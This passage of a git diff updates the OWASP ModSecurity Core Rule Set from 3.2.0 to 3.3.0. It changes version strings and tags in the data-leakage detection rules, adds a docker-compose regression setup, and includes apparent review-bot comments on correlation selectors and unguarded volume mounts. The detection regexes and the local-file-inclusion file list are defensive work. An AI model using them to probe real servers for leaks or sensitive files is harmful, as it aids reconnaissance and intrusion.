- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i:JET Database Engine|Access Database Engine|\[Microsoft\]\[ODBC Microsoft Access Driver\])" \
@@ -79,10 +77,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i:ORA-[0-9][0-9][0-9][0-9]|java\.sql\.SQLException|Oracle error|Oracle.*Driver|Warning.*oci_.*|Warning.*ora_.*)" \
@@ -105,10 +101,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]|CLI Driver.*DB2|DB2 SQL error|db2_\w+\()" \
@@ -131,10 +125,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinity of:)" \
@@ -157,10 +149,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \
@@ -184,10 +174,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollback\." \
@@ -210,10 +198,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \
@@ -236,10 +222,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statement|com\.informix\.jdbc|Exception.*Informix)" \
@@ -263,10 +247,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver)" \
@@ -290,10 +272,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i:Warning: ibase_|Unexpected end of command in statement)" \
@@ -316,10 +296,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \
@@ -342,10 +320,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsoft\]\[ODBC SQL Server Driver\]|\[Macromedia\]\[SQLServer JDBC Driver\]|\[SqlException|System\.Data\.SqlClient\.SqlException|Unclosed quotation mark after the character string|'80040e14'|mssql_query\(\)|Microsoft OLE DB Provider for ODBC Drivers|Microsoft OLE DB Provider for SQL Server|Incorrect syntax near|Sintaxis incorrecta cerca de|Syntax error in string in query expression|Procedure or function .* expects parameter|Unclosed quotation mark before the character string|Syntax error .* in query expression|Data type mismatch in criteria expression\.|ADODB\.Field \(0x800A0BCD\)|the used select statements have different number of columns|OLE DB.*SQL Server|Warning.*mssql_.*|Driver.*SQL[ _-]*Server|SQL Server.*Driver|SQL Server.*[0-9a-fA-F]{8}|Exception.*\WSystem\.Data\.SqlClient\.)" \
@@ -368,10 +344,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid MySQL|Column count doesn't match value count at row|mysql_fetch_array\(\)|on MySQL result index|You have an error in your SQL syntax;|You have an error in your SQL syntax near|MySQL server version for the right syntax to use|\[MySQL\]\[ODBC|Column count doesn't match|Table '[^']+' doesn't exist|SQL syntax.*MySQL|Warning.*mysql_.*|valid MySQL result|MySqlClient\.)" \
@@ -394,10 +368,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i:PostgreSQL query failed:|pg_query\(\) \[:|pg_exec\(\) \[:|PostgreSQL.*ERROR|Warning.*pg_.*|valid PostgreSQL result|Npgsql\.|PG::[a-zA-Z]*Error|Supplied argument is not a valid PostgreSQL .*? resource|Unable to connect to PostgreSQL server)" \
@@ -420,10 +392,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_.*|Warning.*SQLite3::|SQLite/JDBCDriver|SQLite\.Exception|System\.Data\.SQLite\.SQLiteException)" \
@@ -446,10 +416,8 @@ SecRule TX:sql_error_match "@eq 1" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_SQL',\
- tag:'CWE-209',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'CRITICAL',\
 chain"
 SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.*sybase.*|Sybase.*Server message.*)" \
diff --git a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
index ebba913bf..3926a5bf2 100644
--- a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
+++ b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -36,12 +36,9 @@ SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_JAVA',\
- tag:'WASCTC/WASC-13',\
- tag:'OWASP_TOP_10/A6',\
 tag:'PCI/6.5.6',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ERROR',\
 setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
@@ -65,12 +62,9 @@ SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_JAVA',\
- tag:'WASCTC/WASC-13',\
- tag:'OWASP_TOP_10/A6',\
 tag:'PCI/6.5.6',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ERROR',\
 setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
diff --git a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf
index 1aaf5a484..b3afe491f 100644
--- a/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf
+++ b/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -36,12 +36,9 @@ SecRule RESPONSE_BODY "@pmFromFile php-errors.data" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_PHP',\
- tag:'WASCTC/WASC-13',\
- tag:'OWASP_TOP_10/A6',\
 tag:'PCI/6.5.6',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ERROR',\
 setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
@@ -65,12 +62,9 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scan
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_PHP',\
- tag:'WASCTC/WASC-13',\
- tag:'OWASP_TOP_10/A6',\
 tag:'PCI/6.5.6',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ERROR',\
 setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
@@ -98,12 +92,9 @@ SecRule RESPONSE_BODY "@rx <\?(?!xml)" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/SOURCE_CODE_PHP',\
- tag:'WASCTC/WASC-13',\
- tag:'OWASP_TOP_10/A6',\
 tag:'PCI/6.5.6',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ERROR',\
 chain"
 SecRule RESPONSE_BODY "!@rx (?:\x1f\x8b\x08|\b(?:(?:i(?:nterplay|hdr|d3)|m(?:ovi|thd)|r(?:ar!|iff)|(?:ex|jf)if|f(?:lv|ws)|varg|cws)\b|gif)|B(?:%pdf|\.ra)\b|^wOF[F2])" \
diff --git a/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf b/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf
index a38f79f36..c62fc0cbc 100644
--- a/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf
+++ b/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -35,7 +35,7 @@ SecRule RESPONSE_BODY "@rx [a-z]:\\\\inetpub\b" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ERROR',\
 setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
@@ -54,11 +54,9 @@ SecRule RESPONSE_BODY "@rx (?:Microsoft OLE DB Provider for SQL Server(?:<\/font
 tag:'platform-windows',\
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
- tag:'WASCTC/WASC-13',\
- tag:'OWASP_TOP_10/A6',\
 tag:'PCI/6.5.6',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ERROR',\
 setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
@@ -81,12 +79,9 @@ SecRule RESPONSE_BODY "@rx (?:\b(?:A(?:DODB\.Command\b.{0,100}?\b(?:Application
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_IIS',\
- tag:'WASCTC/WASC-13',\
- tag:'OWASP_TOP_10/A6',\
 tag:'PCI/6.5.6',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ERROR',\
 setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\
 setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'"
@@ -107,12 +102,9 @@ SecRule RESPONSE_STATUS "!@rx ^404$" \
 tag:'attack-disclosure',\
 tag:'paranoia-level/1',\
 tag:'OWASP_CRS',\
- tag:'OWASP_CRS/LEAKAGE/ERRORS_IIS',\
- tag:'WASCTC/WASC-13',\
- tag:'OWASP_TOP_10/A6',\
 tag:'PCI/6.5.6',\
 ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ERROR',\
 chain"
 SecRule RESPONSE_BODY "@rx \bServer Error in.{0,50}?\bApplication\b" \
diff --git a/rules/RESPONSE-959-BLOCKING-EVALUATION.conf b/rules/RESPONSE-959-BLOCKING-EVALUATION.conf
index 1e5358b01..8f8114cfc 100644
--- a/rules/RESPONSE-959-BLOCKING-EVALUATION.conf
+++ b/rules/RESPONSE-959-BLOCKING-EVALUATION.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -72,7 +72,7 @@ SecRule TX:OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" \
 t:none,\
 msg:'Outbound Anomaly Score Exceeded (Total Score: %{TX.OUTBOUND_ANOMALY_SCORE})',\
 tag:'anomaly-evaluation',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.anomaly_score=+%{tx.outbound_anomaly_score}'"
diff --git a/rules/RESPONSE-980-CORRELATION.conf b/rules/RESPONSE-980-CORRELATION.conf
index 2b6807c8e..75538f369 100644
--- a/rules/RESPONSE-980-CORRELATION.conf
+++ b/rules/RESPONSE-980-CORRELATION.conf
@@ -1,6 +1,6 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.3.2.0
-# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved.
+# OWASP ModSecurity Core Rule Set ver.3.3.0
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -29,7 +29,7 @@ SecRule &TX:'/LEAKAGE\\\/ERRORS/' "@ge 1" \
 log,\
 msg:'Correlated Successful Attack Identified: (Total Score: %{tx.anomaly_score}) Inbound Attack (Inbound Anomaly Score: %{TX.INBOUND_ANOMALY_SCORE}) + Outbound Data Leakage (Outbound Anomaly Score: %{TX.OUTBOUND_ANOMALY_SCORE})',\
 tag:'event-correlation',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'EMERGENCY',\
 chain,\
 skipAfter:END-CORRELATION"
@@ -46,7 +46,7 @@ SecRule &TX:'/AVAILABILITY\\\/APP_NOT_AVAIL/' "@ge 1" \
 log,\
 msg:'Correlated Attack Attempt Identified: (Total Score: %{tx.anomaly_score}) Inbound Attack (Inbound Anomaly Score: %{TX.INBOUND_ANOMALY_SCORE}) + Outbound Application Error (Outbound Anomaly Score: %{TX.OUTBOUND_ANOMALY_SCORE})',\
 tag:'event-correlation',\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 severity:'ALERT',\
 chain,\
 skipAfter:END-CORRELATION"
@@ -60,7 +60,7 @@ SecAction \
 t:none,\
 nolog,\
 noauditlog,\
- ver:'OWASP_CRS/3.2.0',\
+ ver:'OWASP_CRS/3.3.0',\
 setvar:'tx.executing_anomaly_score=%{tx.anomaly_score_pl1}',\
 setvar:'tx.executing_anomaly_score=+%{tx.anomaly_score_pl2}',\
 setvar:'tx.executing_anomaly_score=+%{tx.anomaly_score_pl3}',\
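Review bot: The correlation rule whose selector appears in the hunk context, `&TX:'/LEAKAGE\\\/ERRORS/' "@ge 1"`, counts TX variables whose name contains `LEAKAGE/ERRORS`, and this commit removes every `tag:'OWASP_CRS/LEAKAGE/ERRORS_*'` from the 951, 952, 953 and 954 rules while only re-versioning this selector. If anything in the rule set derives TX variable names from those tags, the correlation stops firing after this commit; if nothing does, the selector was already dead and should be rewritten or removed rather than carried into 3.3.0 unchanged. I would add a comment above the rule, `# NOTE: this selector depends on TX variables named after the LEAKAGE/ERRORS tags; confirm something still sets them after the tag cleanup`, and a regression test that expects the rule to fire on a correlated SQL-error leak. The same question applies to the `/AVAILABILITY\\\/APP_NOT_AVAIL/` selector in the following hunk. Both SecRules begin outside their hunks.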
@@ -75,7 +75,7 @@ SecRule TX:INBOUND_ANOMALY_SCORE "@lt %{tx.inbound_anomaly_score_threshold}" \ noauditlog,\ msg:'Inbound Anomaly Score (Total Inbound Score: %{TX.INBOUND_ANOMALY_SCORE} - SQLI=%{tx.sql_injection_score},XSS=%{tx.xss_score},RFI=%{tx.rfi_score},LFI=%{tx.lfi_score},RCE=%{tx.rce_score},PHPI=%{tx.php_injection_score},HTTP=%{tx.http_violation_score},SESS=%{tx.session_fixation_score}): individual paranoia level scores: %{TX.ANOMALY_SCORE_PL1}, %{TX.ANOMALY_SCORE_PL2}, %{TX.ANOMALY_SCORE_PL3}, %{TX.ANOMALY_SCORE_PL4}',\ tag:'event-correlation',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule TX:MONITOR_ANOMALY_SCORE "@gt 1" @@ -88,7 +88,7 @@ SecRule TX:INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ noauditlog,\ msg:'Inbound Anomaly Score Exceeded (Total Inbound Score: %{TX.INBOUND_ANOMALY_SCORE} - SQLI=%{tx.sql_injection_score},XSS=%{tx.xss_score},RFI=%{tx.rfi_score},LFI=%{tx.lfi_score},RCE=%{tx.rce_score},PHPI=%{tx.php_injection_score},HTTP=%{tx.http_violation_score},SESS=%{tx.session_fixation_score}): individual paranoia level scores: %{TX.ANOMALY_SCORE_PL1}, %{TX.ANOMALY_SCORE_PL2}, %{TX.ANOMALY_SCORE_PL3}, %{TX.ANOMALY_SCORE_PL4}',\ tag:'event-correlation',\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" SecRule TX:OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" \ "id:980140,\ @@ -99,7 +99,7 @@ SecRule TX:OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" \ noauditlog,\ msg:'Outbound Anomaly Score Exceeded (score %{TX.OUTBOUND_ANOMALY_SCORE}): individual paranoia level scores: %{TX.OUTBOUND_ANOMALY_SCORE_PL1}, %{TX.OUTBOUND_ANOMALY_SCORE_PL2}, %{TX.OUTBOUND_ANOMALY_SCORE_PL3}, %{TX.OUTBOUND_ANOMALY_SCORE_PL4}',\ tag:'event-correlation',\ - ver:'OWASP_CRS/3.2.0'" + ver:'OWASP_CRS/3.3.0'" # Creating a total sum of all triggered outbound rules, including the ones only being monitored SecAction \ 
@@ -109,7 +109,7 @@ SecAction \ t:none,\ nolog,\ noauditlog,\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ setvar:'tx.executing_anomaly_score=%{tx.outbound_anomaly_score_pl1}',\ setvar:'tx.executing_anomaly_score=+%{tx.outbound_anomaly_score_pl2}',\ setvar:'tx.executing_anomaly_score=+%{tx.outbound_anomaly_score_pl3}',\ @@ -124,7 +124,7 @@ SecRule TX:OUTBOUND_ANOMALY_SCORE "@lt %{tx.outbound_anomaly_score_threshold}" \ noauditlog,\ msg:'Outbound Anomaly Score (Total Outbound Score: %{TX.OUTBOUND_ANOMALY_SCORE}): individual paranoia level scores: %{TX.OUTBOUND_ANOMALY_SCORE_PL1}, %{TX.OUTBOUND_ANOMALY_SCORE_PL2}, %{TX.OUTBOUND_ANOMALY_SCORE_PL3}, %{TX.OUTBOUND_ANOMALY_SCORE_PL4}',\ tag:'event-correlation',\ - ver:'OWASP_CRS/3.2.0',\ + ver:'OWASP_CRS/3.3.0',\ chain" SecRule TX:MONITOR_ANOMALY_SCORE "@gt 1" diff --git a/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example b/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example index 89c90420e..7682fc093 100644 --- a/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example +++ b/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example @@ -1,6 +1,6 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.2.0 -# Copyright (c) 2006-2019 Trustwave and contributors. All rights reserved. +# OWASP ModSecurity Core Rule Set ver.3.3.0 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 diff --git a/rules/lfi-os-files.data b/rules/lfi-os-files.data index 956d6e1ae..b32464f2c 100644 --- a/rules/lfi-os-files.data +++ b/rules/lfi-os-files.data @@ -1112,4 +1112,4 @@ npm-debug.log ormconfig.json tsconfig.json webpack.config.js -yarn.lock \ No newline at end of file +yarn.lock diff --git a/tests/docker-compose.yml b/tests/docker-compose.yml new file mode 100644 index 000000000..006adf6d1 --- /dev/null +++ b/tests/docker-compose.yml 
@@ -0,0 +1,41 @@ +version: '3.1' + +# Only one of these will be up at a time for now. +# Concurrency will be on the tests folder we have. + +services: + modsec2-apache: + image: owasp/modsecurity-crs:v3.2-modsec2-apache + environment: + - SERVERNAME=modsec2-apache + - MODSEC_RULE_ENGINE=DetectionOnly + - PARANOIA=5 + volumes: + - ${GITHUB_WORKSPACE}/logs/modsec2-apache:/var/log/apache2 + - ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules + ports: + - "80:80" + + modsec3-apache: + image: owasp/modsecurity-crs:v3.2-modsec3-apache + environment: + - SERVERNAME=modsec3-apache + - MODSEC_RULE_ENGINE=DetectionOnly + - PARANOIA=5 + volumes: + - ${GITHUB_WORKSPACE}/logs/modsec3-apache:/var/log/apache2 + - ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules + ports: + - "80:80" + + modsec3-nginx: + image: owasp/modsecurity-crs:v3.2-modsec3-nginx + environment: + - SERVERNAME=modsec3-nginx + - MODSEC_RULE_ENGINE=DetectionOnly + - PARANOIA=5 + volumes: + - ${GITHUB_WORKSPACE}/logs/modsec3-nginx:/var/log/nginx + - ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules + ports: + - "80:80" diff --git a/tests/regression/config.ini b/tests/regression/config.ini index b62248a91..fd64353b0 100644 --- a/tests/regression/config.ini +++ b/tests/regression/config.ini @@ -1,14 +1,14 @@ -[2.9-apache] +[modsec2-apache] log_date_format = %a %b %d %H:%M:%S.%f %Y log_date_regex = \[([A-Z][a-z]{2} [A-z][a-z]{2} \d{1,2} \d{1,2}\:\d{1,2}\:\d{1,2}\.\d+? \d{4})\] log_location_linux = /var/log/apache2/error.log -[3.0-apache] +[modsec3-apache] log_date_format = %a %b %d %H:%M:%S.%f %Y log_date_regex = \[([A-Z][a-z]{2} [A-z][a-z]{2} \d{1,2} \d{1,2}\:\d{1,2}\:\d{1,2}\.\d+? \d{4})\] log_location_linux = /var/log/apache2/error.log -[3.0-nginx] +[modsec3-nginx] log_date_format = %Y/%m/%d %H:%M:%S log_date_regex = (\d{4}\/\d{2}\/\d{2} \d{2}:\d{2}:\d{2}) log_location_linux = /var/log/nginx/error.log 
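Review bot: All six bind mounts are built from `${GITHUB_WORKSPACE}` with no default or guard, so on any run where the variable is unset Compose expands it to an empty string, the source becomes `/rules`, and the short volume syntax creates an empty host directory and mounts it over `/etc/modsecurity.d/owasp-crs/rules` — the container then runs with no CRS rules, every `no_log_contains` test passes vacuously and only the `log_contains` ones fail. Use the required-variable form so the run aborts instead, e.g. `- ${GITHUB_WORKSPACE:?GITHUB_WORKSPACE must point at the CRS checkout}/rules:/etc/modsecurity.d/owasp-crs/rules`, on each volume line. The images are pulled by the mutable tags `v3.2-modsec2-apache`, `v3.2-modsec3-apache` and `v3.2-modsec3-nginx`, so the regression baseline changes whenever those tags are re-pushed; pin `image: owasp/modsecurity-crs@sha256:…` 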